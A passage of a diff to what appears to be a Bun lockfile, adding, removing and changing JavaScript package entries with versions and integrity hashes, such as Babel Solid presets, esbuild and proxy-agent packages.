"sha512-6WaYesThRMCl19iryMYP7/x2OVgCtbIVflDGFpWnb9irXI3UjYE4AzmYuiUKY1AJstGijoY+MgUszMgRxIYTYw=="], "@types/turndown": ["@types/turndown@5.0.6", "", {}, "sha512-ru00MoyeeouE5BX4gRL+6m/BsDfbRayOskWqUvh7CLGW+UXxHQItqALa38kKnOiZPqJrtzJUgAC2+F0rL1S4Pg=="], @@ -749,7 +731,7 @@ "@xterm/headless": ["@xterm/headless@6.0.0", "", {}, "sha512-5Yj1QINYCyzrZtf8OFIHi47iQtI+0qYFPHmouEfG8dHNxbZ9Tb9YGSuLcsEwj9Z+OL75GJqPyJbyoFer80a2Hw=="], - "agent-base": ["agent-base@9.0.0", "", {}, "sha512-TQf59BsZnytt8GdJKLPfUZ54g/iaUL2OWDSFCCvMOhsHduDQxO8xC4PNeyIkVcA5KwL2phPSv0douC0fgWzmnA=="], + "agent-base": ["agent-base@7.1.4", "", {}, "sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ=="], "ansi-escapes": ["ansi-escapes@7.3.0", "", { "dependencies": { "environment": "^1.0.0" } }, "sha512-BvU8nYgGQBxcmMuEeUEmNTvrMVjJNSH7RgW24vXexN4Ven6qCvy4TntnvlnwnMLTVlcRQQdbRY8NKnaIoeWDNg=="], @@ -765,6 +747,10 @@ "b4a": ["b4a@1.8.1", "", { "peerDependencies": { "react-native-b4a": "*" }, "optionalPeers": ["react-native-b4a"] }, "sha512-aiqre1Nr0B/6DgE2N5vwTc+2/oQZ4Wh1t4NznYY4E00y8LCt6NqdRv81so00oo27D8MVKTpUa/MwUUtBLXCoDw=="], + "babel-plugin-jsx-dom-expressions": ["babel-plugin-jsx-dom-expressions@0.40.6", "", { "dependencies": { "@babel/helper-module-imports": "7.18.6", "@babel/plugin-syntax-jsx": "^7.18.6", "@babel/types": "^7.20.7", "html-entities": "2.3.3", "parse5": "^7.1.2" }, "peerDependencies": { "@babel/core": "^7.20.12" } }, "sha512-v3P1MW46Lm7VMpAkq0QfyzLWWkC8fh+0aE5Km4msIgDx5kjenHU0pF2s+4/NH8CQn/kla6+Hvws+2AF7bfV5qQ=="], + + "babel-preset-solid": ["babel-preset-solid@1.9.12", "", { "dependencies": { "babel-plugin-jsx-dom-expressions": "^0.40.6" }, "peerDependencies": { "@babel/core": "^7.0.0", "solid-js": "^1.9.12" }, "optionalPeers": ["solid-js"] }, "sha512-LLqnuKVDlKpyBlMPcH6qEvs/wmS9a+NczppxJ3ryS/c0O5IiSFOIBQi9GzyiGDSbcJpx4Gr87jyFTos1MyEuWg=="], + "bare-events": ["bare-events@2.8.2", "", { "peerDependencies": { "bare-abort-controller": "*" }, "optionalPeers": ["bare-abort-controller"] }, "sha512-riJjyv1/mHLIPX4RwiK+oW9/4c3TEUeORHKefKAKnZ5kyslbN+HXowtbaVEqt4IMUB7OXlfixcs6gsFeo/jhiQ=="], "bare-fs": ["bare-fs@4.7.1", "", { "dependencies": { "bare-events": "^2.5.4", "bare-path": "^3.0.0", "bare-stream": "^2.6.4", "bare-url": "^2.2.2", "fast-fifo": "^1.3.2" }, "peerDependencies": { "bare-buffer": "*" }, "optionalPeers": ["bare-buffer"] }, "sha512-WDRsyVN52eAx/lBamKD6uyw8H4228h/x0sGGGegOamM2cd7Pag88GfMQalobXI+HaEUxpCkbKQUDOQqt9wawRw=="], @@ -779,26 +765,26 @@ "base64-js": ["base64-js@1.5.1", "", {}, "sha512-AKpaYlHn8t4SVbOHCy+b5+KKgvR4vrsD8vbvrbiQJps7fKDTkjkDry6ji0rUJjC0kzbNePLwzxq8iypo41qeWA=="], + "baseline-browser-mapping": ["baseline-browser-mapping@2.10.29", "", { "bin": { "baseline-browser-mapping": "dist/cli.cjs" } }, "sha512-Asa2krT+XTPZINCS+2QcyS8WTkObE77RwkydwF7h6DmnKqbvlalz93m/dnphUyCa6SWSP51VgtEUf2FN+gelFQ=="], + "basic-ftp": ["basic-ftp@5.3.1", "", {}, "sha512-bopVNp6ugyA150DDuZfPFdt1KZ5a94ZDiwX4hMgZDzF+GttD80lEy8kj98kbyhLXnPvhtIo93mdnLIjpCAeeOw=="], "beautiful-mermaid": ["beautiful-mermaid@1.1.3", "", { "dependencies": { "elkjs": "^0.11.0", "entities": "^7.0.1" } }, "sha512-TItrtrAyHp1vwFfFVYauWGrquouk/6SS21Aq3RsxindSYZODcN4xYrPZD6BiZRU+o5mKJzDPz9MUSMvELdylyg=="], "before-after-hook": ["before-after-hook@4.0.0", "", {}, "sha512-q6tR3RPqIB1pMiTRMFcZwuG5T8vwp+vUvEG0vuI6B+Rikh5BfPp2fQ82c925FOs+b0lcFQ8CFrL+KbilfZFhOQ=="], - "bignumber.js": ["bignumber.js@9.3.1", "", {}, "sha512-Ko0uX15oIUS7wJ3Rb30Fs6SkVbLmPBAKdlm7q9+ak9bbIeFf0MwuBsQV6z7+X768/cHsfg+WlysDWJcmthjsjQ=="], - "bluebird": ["bluebird@3.4.7", "", {}, "sha512-iD3898SR7sWVRHbiQv+sHUtHnMvC1o3nW5rAcqnq3uOn07DSAppZYUkIGslDz6gXC7HfunPe7YVBgoEJASPcHA=="], "boolbase": ["boolbase@1.0.0", "", {}, "sha512-JZOSA7Mo9sNGB8+UjSgzdLtokWAky1zbztM3WRLCbZ70/3cTANmQmOdR7y2g+J0e2WXywy1yS468tY+IruqEww=="], - "bowser": ["bowser@2.14.1", "", {}, "sha512-tzPjzCxygAKWFOJP011oxFHs57HzIhOEracIgAePE4pqB3LikALKnSzUyU4MGs9/iCEUuHlAJTjTc5M+u7YEGg=="], + "browserslist": ["browserslist@4.28.2", "", { "dependencies": { "baseline-browser-mapping": "^2.10.12", "caniuse-lite": "^1.0.30001782", "electron-to-chromium": "^1.5.328", "node-releases": "^2.0.36", "update-browserslist-db": "^1.2.3" }, "bin": { "browserslist": "cli.js" } }, "sha512-48xSriZYYg+8qXna9kwqjIVzuQxi+KYWp2+5nCYnYKPTr0LvD89Jqk2Or5ogxz0NUMfIjhh2lIUX/LyX9B4oIg=="], "buffer-crc32": ["buffer-crc32@0.2.13", "", {}, "sha512-VO9Ht/+p3SN7SKWqcrgEzjGbRSJYTx+Q1pTQC0wrWqHx0vpJraQ6GtHx8tvcg1rlK1byhU5gccxgOgj7B0TDkQ=="], - "buffer-equal-constant-time": ["buffer-equal-constant-time@1.0.1", "", {}, "sha512-zRpUiDwd/xk6ADqPMATG8vc9VPrkck7T07OIx0gnjmJAnHnTVXNQG3vfvWNuiZIkwu9KrKdA1iJKfsfTVxE6NA=="], - "bun-types": ["bun-types@1.3.14", "", { "dependencies": { "@types/node": "*" } }, "sha512-4N0ig0fEomHt5R0KCFWjovxow98rIoRwKolrYdCcknNwMekCXRnWEUvgu5soYV8QXtVsrUD8B95MBOZGPvr6KQ=="], + "caniuse-lite": ["caniuse-lite@1.0.30001792", "", {}, "sha512-hVLMUZFgR4JJ6ACt1uEESvQN1/dBVqPAKY0hgrV70eN3391K6juAfTjKZLKvOMsx8PxA7gsY1/tLMMTcfFLLpw=="], + "chalk": ["chalk@5.6.2", "", {}, "sha512-7NzBL0rN6fMUW+f7A6Io4h40qQlG+xGmtMxfbnH/K7TAtt8JQWVQK+6g0UXKMeVJoyV5EkkNsErQ8pVD3bLHbA=="], "chardet": ["chardet@2.1.1", "", {}, "sha512-PsezH1rqdV9VvyNhxxOW32/d75r01NY7TQCmOqomRo15ZSOKbpTFVsfjghxo6JloQUCGnH4k1LGu0R4yCLlWQQ=="], @@ -831,6 +817,8 @@ "content-type": ["content-type@1.0.5", "", {}, "sha512-nTjqfcBFEipKdXCv4YDQWCfmcLZKm81ldF0pAopTvyrFGVbcR6P/VAAd5G7N+0tTr8QqiU0tFadD6FK4NtJwOA=="], + "convert-source-map": ["convert-source-map@2.0.0", "", {}, "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg=="], + "core-util-is": ["core-util-is@1.0.3", "", {}, "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ=="], "css-select": ["css-select@5.2.2", "", { "dependencies": { "boolbase": "^1.0.0", "css-what": "^6.1.0", "domhandler": "^5.0.2", "domutils": "^3.0.1", "nth-check": "^2.0.1" } }, "sha512-TizTzUddG/xYLA3NXodFM0fSbNizXjOKhqiQQwvhlspadZokn1KDy0NZFS0wuEubIYAV5/c1/lAr0TaaFXEXzw=="], @@ -841,13 +829,13 @@ "csstype": ["csstype@3.2.3", "", {}, "sha512-z1HGKcYy2xA8AGQfwrn0PAy+PB7X/GSj3UVJW9qKyn43xWa+gl5nXmU4qqLMRzWVLFC8KusUX8T/0kCiOYpAIQ=="], - "data-uri-to-buffer": ["data-uri-to-buffer@8.0.0", "", {}, "sha512-6UHfyCux51b8PTGDgveqtz1tvphBku5DrMKKJbFAZAJOI2zsjDpDoYE1+QGj7FOMS4BdTFNJsJiR3zEB0xH0yQ=="], + "data-uri-to-buffer": ["data-uri-to-buffer@6.0.2", "", {}, "sha512-7hvf7/GW8e86rW0ptuwS3OcBGDjIi6SZva7hCyWC0yYry2cOPmLIjXAUHI6DK2HsnwJd9ifmt57i8eV2n4YNpw=="], "date-fns": ["date-fns@4.1.0", "", {}, "sha512-Ukq0owbQXxa/U3EGtsdVBkR1w7KOQ5gIBqdH2hkvknzZPYvBxb/aa6E8L7tmjFtkwZBu3UXBbjIgPo/Ez4xaNg=="], "debug": ["debug@4.4.3", "", { "dependencies": { "ms": "^2.1.3" } }, "sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA=="], - "degenerator": ["degenerator@7.0.1", "", { "dependencies": { "ast-types": "^0.13.4", "escodegen": "^2.1.0", "esprima": "^4.0.1" }, "peerDependencies": { "quickjs-wasi": "^2.2.0" } }, "sha512-ABErK0IefDSyHjlPH7WUEenIAX2rPPnrDcDM+TS3z3+zu9TfyKKi07BQM+8rmxpdE2y1v5fjjdoAS/x4D2U60w=="], + "degenerator": ["degenerator@5.0.1", "", { "dependencies": { "ast-types": "^0.13.4", "escodegen": "^2.1.0", "esprima": "^4.0.1" } }, "sha512-TllpMR/t0M5sqCXfj85i4XaAzxmS5tVA16dqvdkMwGmzI+dXLXnw3J+3Vdv7VKw+ThlTMboK6i9rnZ6Nntj5CQ=="], "detect-libc": ["detect-libc@2.1.2", "", {}, "sha512-Btj2BOOO83o3WyH59e8MgXsxEQVcarkUOpEYrubB0urwnN10yQ364rsiByU11nZlqWYZm05i/of7io4mzihBtQ=="], @@ -867,7 +855,7 @@ "duck": ["duck@0.1.12", "", { "dependencies": { "underscore": "^1.13.1" } }, "sha512-wkctla1O6VfP89gQ+J/yDesM0S7B7XLXjKGzXxMDVFg7uEn706niAtyYovKbyq1oT9YwDcly721/iUWoc8MVRg=="], - "ecdsa-sig-formatter": ["ecdsa-sig-formatter@1.0.11", "", { "dependencies": { "safe-buffer": "^5.0.1" } }, "sha512-nagl3RYrbNv6kQkeJIpt6NJZy8twLB/2vtz6yN9Z4vRKHN4/QZJIEbqohALSgwKdnksuY3k5Addp5lg8sVoVcQ=="], + "electron-to-chromium": ["electron-to-chromium@1.5.353", "", {}, "sha512-kOrWphBi8TOZyiJZqsgqIle0lw+tzmnQK83pV9dZUd01Nm2POECSyFQMAuarzZdYqQW7FH9RaYOuaRo3h+bQ3w=="], "elkjs": ["elkjs@0.11.1", "", {}, "sha512-zxxR9k+rx5ktMwT/FwyLdPCrq7xN6e4VGGHH8hA01vVYKjTFik7nHOxBnAYtrgYUB1RpAiLvA1/U2YraWxyKKg=="], @@ -887,6 +875,8 @@ "es-toolkit": ["es-toolkit@1.46.1", "", {}, "sha512-5eNtXOs3tbfxXOj04tjjseeWkRWaoCjdEI+96DgwzZoe6c9juL49pXlzAFTI72aWC9Y8p7168g6XIKjh7k6pyQ=="], + "esbuild": ["esbuild@0.21.5", "", { "optionalDependencies": { "@esbuild/aix-ppc64": "0.21.5", "@esbuild/android-arm": "0.21.5", "@esbuild/android-arm64": "0.21.5", "@esbuild/android-x64": "0.21.5", "@esbuild/darwin-arm64": "0.21.5", "@esbuild/darwin-x64": "0.21.5", "@esbuild/freebsd-arm64": "0.21.5", "@esbuild/freebsd-x64": "0.21.5", "@esbuild/linux-arm": "0.21.5", "@esbuild/linux-arm64": "0.21.5", "@esbuild/linux-ia32": "0.21.5", "@esbuild/linux-loong64": "0.21.5", "@esbuild/linux-mips64el": "0.21.5", "@esbuild/linux-ppc64": "0.21.5", "@esbuild/linux-riscv64": "0.21.5", "@esbuild/linux-s390x": "0.21.5", "@esbuild/linux-x64": "0.21.5", "@esbuild/netbsd-x64": "0.21.5", "@esbuild/openbsd-x64": "0.21.5", "@esbuild/sunos-x64": "0.21.5", "@esbuild/win32-arm64": "0.21.5", "@esbuild/win32-ia32": "0.21.5", "@esbuild/win32-x64": "0.21.5" }, "bin": { "esbuild": "bin/esbuild" } }, "sha512-mg3OPMV4hXywwpoDxu3Qda5xCKQi+vCTZq8S9J/EpkhB2HzKXq4SNFZE3+NK93JYxc8VMSep+lOUSC/RVKaBqw=="], + "escalade": ["escalade@3.2.0", "", {}, "sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA=="], "escodegen": ["escodegen@2.1.0", "", { "dependencies": { "esprima": "^4.0.1", "estraverse": "^5.2.0", "esutils": "^2.0.2" }, "optionalDependencies": { "source-map": "~0.6.1" }, "bin": { "esgenerate": "bin/esgenerate.js", "escodegen": "bin/escodegen.js" } }, "sha512-2NlIDTwUWJN0mRPQOdtQBzbUHvdGY2P1VXSyU83Q3xKxM7WHX2Ql8dKq782Q9TgQUNOLEzEYu9bzLNj1q88I5w=="], @@ -903,8 +893,6 @@ "exifr": ["exifr@7.1.3", "", {}, "sha512-g/aje2noHivrRSLbAUtBPWFbxKdKhgj/xr1vATDdUXPOFYJlQ62Ft0oy+72V6XLIpDJfHs6gXLbBLAolqOXYRw=="], - "extend": ["extend@3.0.2", "", {}, "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g=="], - "extract-zip": ["extract-zip@2.0.1", "", { "dependencies": { "debug": "^4.1.1", "get-stream": "^5.1.0", "yauzl": "^2.10.0" }, "optionalDependencies": { "@types/yauzl": "^2.9.1" }, "bin": { "extract-zip": "cli.js" } }, "sha512-GDhU9ntwuKyGXdZBUgTIe+vXnWj0fppUEtMDL0+idd5Sta8TGpHssn/eusA9mrPr9qNDym6SxAYZjNvCn/9RBg=="], "fast-content-type-parse": ["fast-content-type-parse@3.0.0", "", {}, "sha512-ZvLdcY8P+N8mGQJahJV5G4U88CSvT1rP8ApL6uETe88MBXrBHAkZlSEySdUlyztF7ccb+Znos3TFqaepHxdhBg=="], @@ -925,8 +913,6 @@ "fecha": ["fecha@4.2.3", "", {}, "sha512-OP2IUU6HeYKJi3i0z4A19kHMQoLVs4Hc+DPqqxI2h/DPZHTm/vjsfC6P0b4jCMy14XizLBqvndQ+UilD7707Jw=="], - "fetch-blob": ["fetch-blob@3.2.0", "", { "dependencies": { "node-domexception": "^1.0.0", "web-streams-polyfill": "^3.0.3" } }, "sha512-7yAQpD2UMJzLi1Dqv7qFYnPbaPx7ZfFK6PiIxQ4PfkGPyNyl2Ugx+a/umUonmKqjhM4DnfbMvdX6otXq83soQQ=="], - "fflate": ["fflate@0.8.2", "", {}, "sha512-cPJU47OaAoCbg0pBvzsgpTPhmhqI5eJjh/JIu8tPj5q+T7iLvW/JAYUqmE7KOB4R1ZyEhzBaIQpQpardBF5z8A=="], "file-stream-rotator": ["file-stream-rotator@0.6.1", "", { "dependencies": { "moment": "^2.29.1" } }, "sha512-u+dBid4PvZw17PmDeRcNOtCP9CCK/9lRN2w+r1xIS7yOL9JFrIBKTvrYsxT4P0pGtThYTn++QS5ChHaUov3+zQ=="], @@ -935,11 +921,9 @@ "fn.name": ["fn.name@1.1.0", "", {}, "sha512-GRnmB5gPyJpAhTQdSZTSp9uaPSvl09KoYcMQtsB9rQoOmzs9dH6ffeccH+Z+cv6P68Hu5bC6JjRh4Ah/mHSNRw=="], - "formdata-polyfill": ["formdata-polyfill@4.0.10", "", { "dependencies": { "fetch-blob": "^3.1.2" } }, "sha512-buewHzMvYL29jdeQTVILecSaZKnt/RJWjoZCF5OW60Z67/GmSLBkOFM7qh1PI3zFNtJbaZL5eQu1vLfazOwj4g=="], + "fsevents": ["fsevents@2.3.3", "", { "os": "darwin" }, "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw=="], - "gaxios": ["gaxios@7.1.4", "", { "dependencies": { "extend": "^3.0.2", "https-proxy-agent": "^7.0.1", "node-fetch": "^3.3.2" } }, "sha512-bTIgTsM2bWn3XklZISBTQX7ZSddGW+IO3bMdGaemHZ3tbqExMENHLx6kKZ/KlejgrMtj8q7wBItt51yegqalrA=="], - - "gcp-metadata": ["gcp-metadata@8.1.2", "", { "dependencies": { "gaxios": "^7.0.0", "google-logging-utils": "^1.0.0", "json-bigint": "^1.0.0" } }, "sha512-zV/5HKTfCeKWnxG0Dmrw51hEWFGfcF2xiXqcA3+J90WDuP0SvoiSO5ORvcBsifmx/FoIjgQN3oNOGaQ5PhLFkg=="], + "gensync": ["gensync@1.0.0-beta.2", "", {}, "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg=="], "get-caller-file": ["get-caller-file@2.0.5", "", {}, "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg=="], @@ -947,23 +931,21 @@ "get-stream": ["get-stream@5.2.0", "", { "dependencies": { "pump": "^3.0.0" } }, "sha512-nBF+F1rAZVCu/p7rjzgA+Yb4lfYXrpl7a6VmJrU8wF9I1CKvP/QwPNZHnOlwbTkY6dvtFIzFMSyQXbLoTQPRpA=="], - "get-uri": ["get-uri@8.0.0", "", { "dependencies": { "basic-ftp": "^5.2.0", "data-uri-to-buffer": "8.0.0", "debug": "^4.3.4" } }, "sha512-CqtZlMKvfJeY0Zxv8wazDwXmSKmnMnsmNy8j8+wudi8EyG/pMUB1NqHc+Tv1QaNtpYsK9nOYjb7r7Ufu32RPSw=="], - - "google-auth-library": ["google-auth-library@10.6.2", "", { "dependencies": { "base64-js": "^1.3.0", "ecdsa-sig-formatter": "^1.0.11", "gaxios": "^7.1.4", "gcp-metadata": "8.1.2", "google-logging-utils": "1.1.3", "jws": "^4.0.0" } }, "sha512-e27Z6EThmVNNvtYASwQxose/G57rkRuaRbQyxM2bvYLLX/GqWZ5chWq2EBoUchJbCc57eC9ArzO5wMsEmWftCw=="], - - "google-logging-utils": ["google-logging-utils@1.1.3", "", {}, "sha512-eAmLkjDjAFCVXg7A1unxHsLf961m6y17QFqXqAXGj/gVkKFrEICfStRfwUlGNfeCEjNRa32JEWOUTlYXPyyKvA=="], + "get-uri": ["get-uri@6.0.5", "", { "dependencies": { "basic-ftp": "^5.0.2", "data-uri-to-buffer": "^6.0.2", "debug": "^4.3.4" } }, "sha512-b1O07XYq8eRuVzBNgJLstU6FYc1tS6wnMtF1I1D9lE8LxZSOGZ7LhxN54yPP6mGw5f2CkXY2BQUL9Fx41qvcIg=="], "graceful-fs": ["graceful-fs@4.2.11", "", {}, "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ=="], "handlebars": ["handlebars@4.7.9", "", { "dependencies": { "minimist": "^1.2.5", "neo-async": "^2.6.2", "source-map": "^0.6.1", "wordwrap": "^1.0.0" }, "optionalDependencies": { "uglify-js": "^3.1.4" }, "bin": { "handlebars": "bin/handlebars" } }, "sha512-4E71E0rpOaQuJR2A3xDZ+GM1HyWYv1clR58tC8emQNeQe3RH7MAzSbat+V0wG78LQBo6m6bzSG/L4pBuCsgnUQ=="], + "html-entities": ["html-entities@2.3.3", "", {}, "sha512-DV5Ln36z34NNTDgnz0EWGBLZENelNAtkiFA4kyNOG2tDI6Mz1uSWiq1wAKdyjnJwyDiDO7Fa2SO1CTxPXL8VxA=="], + "html-escaper": ["html-escaper@3.0.3", "", {}, "sha512-RuMffC89BOWQoY0WKGpIhn5gX3iI54O6nRA0yC124NYVtzjmFWBIiFd8M0x+ZdX0P9R4lADg1mgP8C7PxGOWuQ=="], "htmlparser2": ["htmlparser2@10.1.0", "", { "dependencies": { "domelementtype": "^2.3.0", "domhandler": "^5.0.3", "domutils": "^3.2.2", "entities": "^7.0.1" } }, "sha512-VTZkM9GWRAtEpveh7MSF6SjjrpNVNNVJfFup7xTY3UpFtm67foy9HDVXneLtFVt4pMz5kZtgNcvCniNFb1hlEQ=="], - "http-proxy-agent": ["http-proxy-agent@9.0.0", "", { "dependencies": { "agent-base": "9.0.0", "debug": "^4.3.4" } }, "sha512-FcF8VhXYLQcxWCnt/cCpT2apKsRDUGeVEeMqGu4HSTu29U8Yw0TLOjdYIlDsYk3IkUh+taX4IDWpPcCqKDhCjA=="], + "http-proxy-agent": ["http-proxy-agent@7.0.2", "", { "dependencies": { "agent-base": "^7.1.0", "debug": "^4.3.4" } }, "sha512-T1gkAiYYDWYx3V5Bmyu7HcfcvL7mUrTWiM6yOfa3PIphViJ/gFPbvidQ+veqSOHci/PxBcDabeUNCzpOODJZig=="], - "https-proxy-agent": ["https-proxy-agent@9.0.0", "", { "dependencies": { "agent-base": "9.0.0", "debug": "^4.3.4" } }, "sha512-/MVmHp58WkOypgFhCLk4fzpPcFQvTJ/e6LBI7irpIO2HfxUbpmYoHF+KzipzJpxxzJu7aJNWQ0xojJ/dzV2G5g=="], + "https-proxy-agent": ["https-proxy-agent@7.0.6", "", { "dependencies": { "agent-base": "^7.1.2", "debug": "4" } }, "sha512-vK9P5/iUfdl95AI+JVyUuIcVtd4ofvtrOr3HNtM2yxC9bnMbEdp3x01OhQNnjb8IJYi38VlTE3mBXwcfvywuSw=="], "iconv-lite": ["iconv-lite@0.7.2", "", { "dependencies": { "safer-buffer": ">= 2.1.2 < 3.0.0" } }, "sha512-im9DjEDQ55s9fL4EYzOAv0yMqmMBSZp6G0VvFyTMPKWxiSBHUj9NW/qqLmXUwXrrM7AvqSlTCfvqRb0cM8yYqw=="], @@ -979,6 +961,8 @@ "is-stream": ["is-stream@2.0.1", "", {}, "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg=="], + "is-what": ["is-what@4.1.16", "", {}, "sha512-ZhMwEosbFJkA0YhFnNDgTM4ZxDRsS6HqTo7qsZM08fehyRYIYa0yHu5R6mgo1n/8MgaPBXiPimPD77baVFYg+A=="], + "isarray": ["isarray@1.0.0", "", {}, "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ=="], "jiti": ["jiti@2.7.0", "", { "bin": { "jiti": "lib/jiti-cli.mjs" } }, "sha512-AC/7JofJvZGrrneWNaEnJeOLUx+JlGt7tNa0wZiRPT4MY1wmfKjt2+6O2p2uz2+skll8OZZmJMNqeke7kKbNgQ=="], @@ -989,18 +973,14 @@ "jsesc": ["jsesc@3.1.0", "", { "bin": { "jsesc": "bin/jsesc" } }, "sha512-/sM3dO2FOzXjKQhJuo0Q173wf2KOo8t4I8vHy6lF9poUp7bKT0/NHE8fPX23PwfhnykfqnC2xRxOnVw5XuGIaA=="], - "json-bigint": ["json-bigint@1.0.0", "", { "dependencies": { "bignumber.js": "^9.0.0" } }, "sha512-SiPv/8VpZuWbvLSMtTDU8hEfrZWg/mH/nV/b4o0CYbSxu1UIQPLdwKOCIyLQX+VIPO5vrLX3i8qtqFyhdPSUSQ=="], - "json-schema-to-ts": ["json-schema-to-ts@3.1.1", "", { "dependencies": { "@babel/runtime": "^7.18.3", "ts-algebra": "^2.0.0" } }, "sha512-+DWg8jCJG2TEnpy7kOm/7/AxaYoaRbjVB4LFZLySZlWn8exGs3A4OLJR966cVvU26N7X9TWxl+Jsw7dzAqKT6g=="], "json-with-bigint": ["json-with-bigint@3.5.8", "", {}, "sha512-eq/4KP6K34kwa7TcFdtvnftvHCD9KvHOGGICWwMFc4dOOKF5t4iYqnfLK8otCRCRv06FXOzGGyqE8h8ElMvvdw=="], + "json5": ["json5@2.2.3", "", { "bin": { "json5": "lib/cli.js" } }, "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg=="], + "jszip": ["jszip@3.10.1", "", { "dependencies": { "lie": "~3.3.0", "pako": "~1.0.2", "readable-stream": "~2.3.6", "setimmediate": "^1.0.5" } }, "sha512-xXDvecyTpGLrqFrvkrUSoxxfJI5AH7U8zxxtVclpsUtMCq4JQ290LY8AW5c7Ggnr/Y/oK+bQMbqK2qmtk3pN4g=="], - "jwa": ["jwa@2.0.1", "", { "dependencies": { "buffer-equal-constant-time": "^1.0.1", "ecdsa-sig-formatter": "1.0.11", "safe-buffer": "^5.0.1" } }, "sha512-hRF04fqJIP8Abbkq5NKGN0Bbr3JxlQ+qhZufXVr0DvujKy93ZCbXZMHDL4EOtodSbCWxOqR8MS1tXA5hwqCXDg=="], - - "jws": ["jws@4.0.1", "", { "dependencies": { "jwa": "^2.0.1", "safe-buffer": "^5.0.1" } }, "sha512-EKI/M/yqPncGUUh44xz0PxSidXFr/+r0pA70+gIYhjv+et7yxM+s29Y+VGDkovRofQem0fs7Uvf4+YmAdyRduA=="], - "kuler": ["kuler@2.0.0", "", {}, "sha512-Xq9nH7KlWZmXAtodXDDRE7vs6DU1gTU8zYDHDiWLSip45Egwq3plLHzPn27NgvzL2r1LMPC1vdqh98sQxtqj4A=="], "lie": ["lie@3.3.0", "", { "dependencies": { "immediate": "~3.0.5" } }, "sha512-UaiMJzeWRlEujzAuw5LokY1L5ecNQYZKfmyZ9L7wDHb/p5etKaxXhohBcrw0EYby+G/NA52vRSN4N39dxHAIwQ=="], @@ -1039,8 +1019,6 @@ "logform": ["logform@2.7.0", "", { "dependencies": { "@colors/colors": "1.6.0", "@types/triple-beam": "^1.3.2", "fecha": "^4.2.0", "ms": "^2.1.1", "safe-stable-stringify": "^2.3.1", "triple-beam": "^1.3.0" } }, "sha512-TFYA4jnP7PVbmlBIfhlSe+WKxs9dklXMTEGcBCIvLhE/Tn3H6Gk1norupVW7m5Cnd4bLcr08AytbyV/xj7f/kQ=="], - "long": ["long@5.3.2", "", {}, "sha512-mNAgZ1GmyNhD7AuqnTG3/VQ26o760+ZYBPKjPvugO8+nLbYfX6TVpJPseBvopbdY+qpZ/lKUnmEc1LeZYS3QAA=="], - "lop": ["lop@0.4.2", "", { "dependencies": { "duck": "^0.1.12", "option": "~0.2.1", "underscore": "^1.13.1" } }, "sha512-RefILVDQ4DKoRZsJ4Pj22TxE3omDO47yFpkIBoDKzkqPRISs5U1cnAdg/5583YPkWPaLIYHOKRMQSvjFsO26cw=="], "lru-cache": ["lru-cache@11.3.6", "", {}, "sha512-Gf/KoL3C/MlI7Bt0PGI9I+TeTC/I6r/csU58N4BSNc4lppLBeKsOdFYkK+dX0ABDUMJNfCHTyPpzwwO21Awd3A=="], @@ -1057,6 +1035,8 @@ "media-typer": ["media-typer@1.1.0", "", {}, "sha512-aisnrDP4GNe06UcKFnV5bfMNPBUw4jsLGaWwWfnH3v02GnBuXX2MCVn5RbrWo0j3pczUilYblq7fQ7Nw2t5XKw=="], + "merge-anything": ["merge-anything@5.1.7", "", { "dependencies": { "is-what": "^4.1.8" } }, "sha512-eRtbOb1N5iyH0tkQDAoQ4Ipsp/5qSR79Dzrz8hEPxRX10RWWR/iQXdoKmBSRCThY1Fh5EhISDtpSc93fpxUniQ=="], + "mimic-function": ["mimic-function@5.0.1", "", {}, "sha512-VP79XUPxV2CigYP3jWwAUFSku2aKqBH7uTAapFWCBqutsbmDo96KY5o8uh6U+/YSIn5OxJnXp73beVkpqMIGhA=="], "minimist": ["minimist@1.2.8", "", {}, "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA=="], @@ -1079,9 +1059,7 @@ "netmask": ["netmask@2.1.1", "", {}, "sha512-eonl3sLUha+S1GzTPxychyhnUzKyeQkZ7jLjKrBagJgPla13F+uQ71HgpFefyHgqrjEbCPkDArxYsjY8/+gLKA=="], - "node-domexception": ["node-domexception@1.0.0", "", {}, "sha512-/jKZoMpw0F8GRwl4/eLROPA3cfcXtLApP0QzLmUT/HuPCZWyB7IY9ZrMeKw2O/nFIqPQB3PVM9aYm0F312AXDQ=="], - - "node-fetch": ["node-fetch@3.3.2", "", { "dependencies": { "data-uri-to-buffer": "^4.0.0", "fetch-blob": "^3.1.4", "formdata-polyfill": "^4.0.10" } }, 